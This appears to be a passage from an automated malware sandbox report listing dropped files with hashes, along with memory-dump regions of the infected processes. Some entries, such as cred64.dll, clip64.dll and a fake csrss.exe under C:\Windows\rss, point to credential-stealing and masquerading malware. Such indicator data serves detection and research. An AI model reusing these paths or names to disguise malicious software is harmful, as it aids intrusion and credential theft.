SHA51283889ebca4279c049ea79163465a2fe4c3fd261add850d95ee40385925fbd50f53fc626f8242fe4e16959c6159fa5db3d2c33063d0c58e66b34bee87dfda5a30
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Iz10bE7.exeFilesize
886KB
MD54c4400f443f305a4364b47cdaa10943b
SHA1198414c1f130b21b99708d5e080e2b950f4899f6
SHA256f4f2a4ff8ae942484ded6be4dadf62e5c713bca3bd92e6883810ef8fcc87c6a8
SHA51236152764d156107b458cb0ecce353b19068534bba735eda007119012fdd6957368c388e414476a55206b659ab4cbc6a3e15e491613921f91ac0fc478196545b7
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Iz10bE7.exeFilesize
886KB
MD54c4400f443f305a4364b47cdaa10943b
SHA1198414c1f130b21b99708d5e080e2b950f4899f6
SHA256f4f2a4ff8ae942484ded6be4dadf62e5c713bca3bd92e6883810ef8fcc87c6a8
SHA51236152764d156107b458cb0ecce353b19068534bba735eda007119012fdd6957368c388e414476a55206b659ab4cbc6a3e15e491613921f91ac0fc478196545b7
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Hu0424.exeFilesize
1.1MB
MD521e784c6ec29fb42bc74fefbe0cbbedb
SHA1c905016924a725ae97a30824084f5a4ba7b0a595
SHA256a0642f8c9b1915fbc881c674de6fdca993bea96a25645c50e5862533dfc888c2
SHA512453d5c2a1d7d5690aa64128e0bee40ee47215fd7396bfc32955151312be2226087782640ab22365480274b0d5dedd5ef3733324883b32e77b2c41aab074dda60
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Hu0424.exeFilesize
1.1MB
MD521e784c6ec29fb42bc74fefbe0cbbedb
SHA1c905016924a725ae97a30824084f5a4ba7b0a595
SHA256a0642f8c9b1915fbc881c674de6fdca993bea96a25645c50e5862533dfc888c2
SHA512453d5c2a1d7d5690aa64128e0bee40ee47215fd7396bfc32955151312be2226087782640ab22365480274b0d5dedd5ef3733324883b32e77b2c41aab074dda60
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnfo410z.rzk.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeFilesize
219KB
MD56066effdeb30d7d28b35593f12ab7a86
SHA1c3882e55aa870f4ad6f8462d56fc9057825e306e
SHA2569645cb504d7f320e64a8141f85b1f99fd8976165690aaa9ae4de367bb6ea80c5
SHA512272183560b6cd033cea259a962dd606567146a11e10c274773dd8a1b2c02e75048c37688f1c5977bcaecdb38aed98b76a0e9bf9dd2890c336b62d0f982b6e55f
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeFilesize
219KB
MD56066effdeb30d7d28b35593f12ab7a86
SHA1c3882e55aa870f4ad6f8462d56fc9057825e306e
SHA2569645cb504d7f320e64a8141f85b1f99fd8976165690aaa9ae4de367bb6ea80c5
SHA512272183560b6cd033cea259a962dd606567146a11e10c274773dd8a1b2c02e75048c37688f1c5977bcaecdb38aed98b76a0e9bf9dd2890c336b62d0f982b6e55f
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeFilesize
219KB
MD56066effdeb30d7d28b35593f12ab7a86
SHA1c3882e55aa870f4ad6f8462d56fc9057825e306e
SHA2569645cb504d7f320e64a8141f85b1f99fd8976165690aaa9ae4de367bb6ea80c5
SHA512272183560b6cd033cea259a962dd606567146a11e10c274773dd8a1b2c02e75048c37688f1c5977bcaecdb38aed98b76a0e9bf9dd2890c336b62d0f982b6e55f
-
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dllFilesize
89KB
MD5e913b0d252d36f7c9b71268df4f634fb
SHA15ac70d8793712bcd8ede477071146bbb42d3f018
SHA2564cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA5123ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4
-
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dllFilesize
273B
MD5a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA15aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA2565f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA5123cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h0hg436k.default-release\prefs.jsFilesize
7KB
MD50c19fa3927c2a3af8ad02c3fd35a357c
SHA1d28df625954b8e60ea88e1ed21b04d0cb50314b5
SHA2562ab82e94f6fa0555c38468cce2999d64e5f84cf08dd015c8be8b10e5e441063a
SHA5120dced9e23296ac44ca2be5ffd5840389a08f88caa91568c9fe033b65c2c883d79cb03c383b470fde7f28a1299c56c9cc5aed627e30787974b2e80410c9ae38f3
-
C:\Users\Admin\AppData\Roaming\fcftiavFilesize
173KB
MD52aa70916a47ad55b25b51b15e07ded8e
SHA14eac7c1c0af31e01535a895041741f1e250aa034
SHA256f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exeFilesize
6.9MB
MD5cd3191644eeaab1d1cf9b4bea245f78c
SHA175f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA51279ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a
-
C:\Windows\rss\csrss.exeFilesize
4.1MB
MD51c01927ac6e677d4f277cb9f7648ca70
SHA130d980c95b28c4856baef117e228d75e6a25e113
SHA256c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA51271989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e
-
memory/220-1402-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/220-1340-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/1680-1325-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/1680-1228-0x0000000000BB0000-0x0000000001E30000-memory.dmpFilesize
18.5MB
-
memory/1680-1224-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3012-99-0x000000000BFD0000-0x000000000C00E000-memory.dmpFilesize
248KB
-
memory/3012-87-0x000000000BDB0000-0x000000000BE42000-memory.dmpFilesize
584KB
-
memory/3012-96-0x000000000CDC0000-0x000000000D3C6000-memory.dmpFilesize
6.0MB
-
memory/3012-91-0x00000000098A0000-0x00000000098AA000-memory.dmpFilesize
40KB
-
memory/3012-97-0x000000000C130000-0x000000000C23A000-memory.dmpFilesize
1.0MB
-
memory/3012-85-0x000000000C2B0000-0x000000000C7AE000-memory.dmpFilesize
5.0MB
-
memory/3012-84-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3012-100-0x000000000C020000-0x000000000C06B000-memory.dmpFilesize
300KB
-
memory/3012-75-0x0000000000400000-0x000000000043E000-memory.dmpFilesize
248KB
-
memory/3012-395-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3012-98-0x000000000BF70000-0x000000000BF82000-memory.dmpFilesize
72KB
-
memory/3260-64-0x0000000002D40000-0x0000000002D56000-memory.dmpFilesize
88KB
-
memory/3536-967-0x0000000007890000-0x00000000078A0000-memory.dmpFilesize
64KB
-
memory/3536-957-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3536-758-0x0000000007890000-0x00000000078A0000-memory.dmpFilesize
64KB
-
memory/3536-756-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3652-125-0x0000015C3B020000-0x0000015C3B030000-memory.dmpFilesize
64KB
-
memory/3652-160-0x0000015C3A3C0000-0x0000015C3A3C2000-memory.dmpFilesize
8KB
-
memory/3652-141-0x0000015C3B800000-0x0000015C3B810000-memory.dmpFilesize
64KB
-
memory/3804-121-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3804-48-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3804-42-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/3804-95-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/3908-59-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/3908-56-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/3908-57-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/3908-49-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/4184-342-0x00000212811B0000-0x00000212811D0000-memory.dmpFilesize
128KB
-
memory/4260-65-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/4260-54-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/4392-1345-0x00000000013C0000-0x0000000001AAF000-memory.dmpFilesize
6.9MB
-
memory/4392-1403-0x00000000013C0000-0x0000000001AAF000-memory.dmpFilesize
6.9MB
-
memory/4452-1399-0x0000000000400000-0x0000000000627000-memory.dmpFilesize
2.2MB
-
memory/4452-1396-0x0000000000400000-0x0000000000627000-memory.dmpFilesize
2.2MB
-
memory/4576-1432-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/4576-1367-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/4896-1353-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB
-
memory/4896-1413-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/4896-1366-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5068-292-0x000001F1BA7C0000-0x000001F1BA7E0000-memory.dmpFilesize
128KB
-
memory/5068-465-0x000001F1C62B0000-0x000001F1C63B0000-memory.dmpFilesize
1024KB
-
memory/5088-411-0x000002CBD2300000-0x000002CBD2302000-memory.dmpFilesize
8KB
-
memory/5088-275-0x000002CBC1120000-0x000002CBC1122000-memory.dmpFilesize
8KB
-
memory/5088-394-0x000002CBD2100000-0x000002CBD2102000-memory.dmpFilesize
8KB
-
memory/5088-536-0x000002CBD3EE0000-0x000002CBD3EE2000-memory.dmpFilesize
8KB
-
memory/5088-526-0x000002CBD26E0000-0x000002CBD26E2000-memory.dmpFilesize
8KB
-
memory/5088-403-0x000002CBD22C0000-0x000002CBD22C2000-memory.dmpFilesize
8KB
-
memory/5088-386-0x000002CBD1B50000-0x000002CBD1B52000-memory.dmpFilesize
8KB
-
memory/5088-384-0x000002CBD1500000-0x000002CBD1600000-memory.dmpFilesize
1024KB
-
memory/5088-408-0x000002CBD22E0000-0x000002CBD22E2000-memory.dmpFilesize
8KB
-
memory/5088-273-0x000002CBD1A00000-0x000002CBD1A02000-memory.dmpFilesize
8KB
-
memory/5088-523-0x000002CBD2650000-0x000002CBD2652000-memory.dmpFilesize
8KB
-
memory/5088-414-0x000002CBD2340000-0x000002CBD2342000-memory.dmpFilesize
8KB
-
memory/5088-529-0x000002CBD3EB0000-0x000002CBD3EB2000-memory.dmpFilesize
8KB
-
memory/5088-533-0x000002CBD3ED0000-0x000002CBD3ED2000-memory.dmpFilesize
8KB
-
memory/5088-277-0x000002CBC1140000-0x000002CBC1142000-memory.dmpFilesize
8KB
-
memory/5152-969-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5152-762-0x00000000005C0000-0x00000000005CA000-memory.dmpFilesize
40KB
-
memory/5152-763-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5168-1388-0x0000000000820000-0x0000000000829000-memory.dmpFilesize
36KB
-
memory/5168-1370-0x0000000000A40000-0x0000000000B40000-memory.dmpFilesize
1024KB
-
memory/5456-775-0x0000000000B80000-0x0000000000BBE000-memory.dmpFilesize
248KB
-
memory/5456-988-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5456-776-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5712-1421-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/5712-1394-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/5776-1407-0x0000000000400000-0x0000000000627000-memory.dmpFilesize
2.2MB
-
memory/5808-1411-0x00007FFAF5EE0000-0x00007FFAF68CC000-memory.dmpFilesize
9.9MB
-
memory/5808-1408-0x000000001B0B0000-0x000000001B0C0000-memory.dmpFilesize
64KB
-
memory/5808-1351-0x00007FFAF5EE0000-0x00007FFAF68CC000-memory.dmpFilesize
9.9MB
-
memory/5808-1347-0x000000001B0B0000-0x000000001B0C0000-memory.dmpFilesize
64KB
-
memory/5808-1343-0x00000000002F0000-0x00000000002F8000-memory.dmpFilesize
32KB
-
memory/5944-1319-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5944-1309-0x0000000000AE0000-0x0000000000C5E000-memory.dmpFilesize
1.5MB
-
memory/5944-1344-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/5952-1449-0x0000000007ED0000-0x0000000007F36000-memory.dmpFilesize
408KB
-
memory/5952-1451-0x0000000008230000-0x0000000008580000-memory.dmpFilesize
3.3MB
-
memory/5952-1450-0x0000000007FB0000-0x0000000008016000-memory.dmpFilesize
408KB
-
memory/5952-1448-0x0000000007700000-0x0000000007722000-memory.dmpFilesize
136KB
-
memory/5952-1444-0x0000000005110000-0x0000000005120000-memory.dmpFilesize
64KB
-
memory/5952-1446-0x00000000077F0000-0x0000000007E18000-memory.dmpFilesize
6.2MB
-
memory/5952-1445-0x0000000005110000-0x0000000005120000-memory.dmpFilesize
64KB
-
memory/5952-1443-0x00000000050C0000-0x00000000050F6000-memory.dmpFilesize
216KB
-
memory/5952-1442-0x0000000073870000-0x0000000073F5E000-memory.dmpFilesize
6.9MB
-
memory/6016-1412-0x0000000000400000-0x0000000000D1B000-memory.dmpFilesize
9.1MB
-
memory/6016-1406-0x0000000002E30000-0x000000000371B000-memory.dmpFilesize
8.9MB
-
memory/6016-1404-0x0000000002930000-0x0000000002D29000-memory.dmpFilesize
4.0MB